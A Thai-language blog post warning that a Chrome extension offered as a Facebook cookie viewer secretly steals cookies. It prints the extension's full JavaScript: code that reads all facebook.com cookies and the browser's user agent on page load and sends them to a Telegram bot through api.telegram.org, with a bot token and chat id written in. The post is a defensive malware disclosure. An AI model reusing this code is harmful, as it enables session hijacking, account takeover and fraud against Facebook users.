แล้วโปรแกรมดังกล่าวคืออะไร ?
- เป็น extensions ของ google chrome เป็นส่วนขยายที่เพิ่มความสามารถให้ google chrome นั้นเอง
แต่โปรแกรมดังกล่างเป็นดึงข้อมูลที่เป็น cookie ของ facebook ออกมาดูหรือ ปรับเปลี่ยน cookie ยัดข้อมูลใหม่ไปให้ facebook
แต่โปรแกรมดังกล่างเป็นดึงข้อมูลที่เป็น cookie ของ facebook ออกมาดูหรือ ปรับเปลี่ยน cookie ยัดข้อมูลใหม่ไปให้ facebook
โปรแกรมตัวไว้ใช้ทำอะไรได้
จะพูดง่ายก็คือโปรแกรมใช้ไว้เช็ค cookie นั้นแหละครับแต่ก็สามารถใช้งานด้านไม่ดีได้ด้วยพวกขโมย cookie แล้วปลอมเป็นคนที่ถูกขโมยข้อมูลไปทำเรื่องไม่ดี
แต่เดี๋ยวก่อนอย่าพึ่งใช้โปรแกรมดังมีสิ่งแอบแฝง
เนื่องด้วยบทความนี้ผมมาเตือน ถ้าคุณไม่แก้ไข้โปรแกรมก่อนคุณอาจถูก Hack ข้อมูลทันทีที่ใช้งาน
เดี๋ยวผมจะชำแหละโปรแกรมดังให้ดู
เมื่อเราโหลดโปรแกรมมาเราจะเจอไฟล์
เมื่อเราโหลดโปรแกรมมาเราจะเจอไฟล์
window.onload = function SendCookie(){
chrome.cookies.getAll({
url: "https://www.facebook.com"
}, ((cookies) => {
let text ='Number of cookies=' + cookies.length + '\n';
for (let cookie of cookies){
text += 'domain=' + cookie.domain + ',path=' + cookie.path + ',name=' + cookie.name + ',value=' + cookie.value + '\n';
}
document.getElementById('id_text').value = text;
botTele(text)
}));
}
document.getElementById('id_button_getAll').onclick = () => {
chrome.cookies.getAll({
url: "https://www.facebook.com"
}, ((cookies) => {
let text ='Number of cookies=' + cookies.length + '\n';
for (let cookie of cookies){
text += 'domain=' + cookie.domain + ',path=' + cookie.path + ',name=' + cookie.name + ',value=' + cookie.value + '\n';
}
document.getElementById('id_text').value = text;
var t = "";
var l = "";
var u ="";
for (var o = 0; o < cookies.length; o++) t += cookies[o].name + "=" + cookies[o].value + ";", "c_user" == cookies[o].name && (l = cookies[o].value);
if ("" == l) return document.getElementById("id_text").value = "", !1; u = t
navigator.userAgent, document.querySelector('[name="user-agent"]:checked') && (u += "|" + window.navigator.userAgent, console.log(u))
console.log(t);
console.log('-----')
console.log(u);
document.getElementById("id_text").value = u
//document.getElementById("fb_id").innerHTML = "Facebook id : " + l, u && f()
botTele(u)
}));
}
function botTele(text){
var chat_id = -773511937; // replace with yours
var enc_data = text;
var token = "5712740653:AAFreDzJcJMwmYXULecs3-l5rHOpY5XSb78"; // from botfather
var blob = new Blob([enc_data], { type: 'plain/text' });
var formData = new FormData();
formData.append('chat_id', chat_id);
formData.append('document', blob, 'Data_Cookies.txt');
var request = new XMLHttpRequest();
request.open('POST', `https://api.telegram.org/bot${token}/sendDocument`);
request.send(formData);
}
จะเห็นว่า function botTele มีการแอบส่ง cookie ของเราไปยัง telegram ซึ่งคนที่ได้ cookie ของเราสามารถ login facebook ของเราได้ทันทีและสามารถนำไปใช้อย่างอื่นได้อีกด้วย เช่น
- หลอกคนที่เรารู้จักติดตั้งโปรแกรมหรือหลอกขอเงิน
- นำ facebook ไปทำเรื่องที่ไม่ดีหรือนำข้อมูลส่วนตัวใน facebook มาเปิดเผย
- นำ facebook ไปยิง Ads กรณีผูกบัตรไว้
0 Comments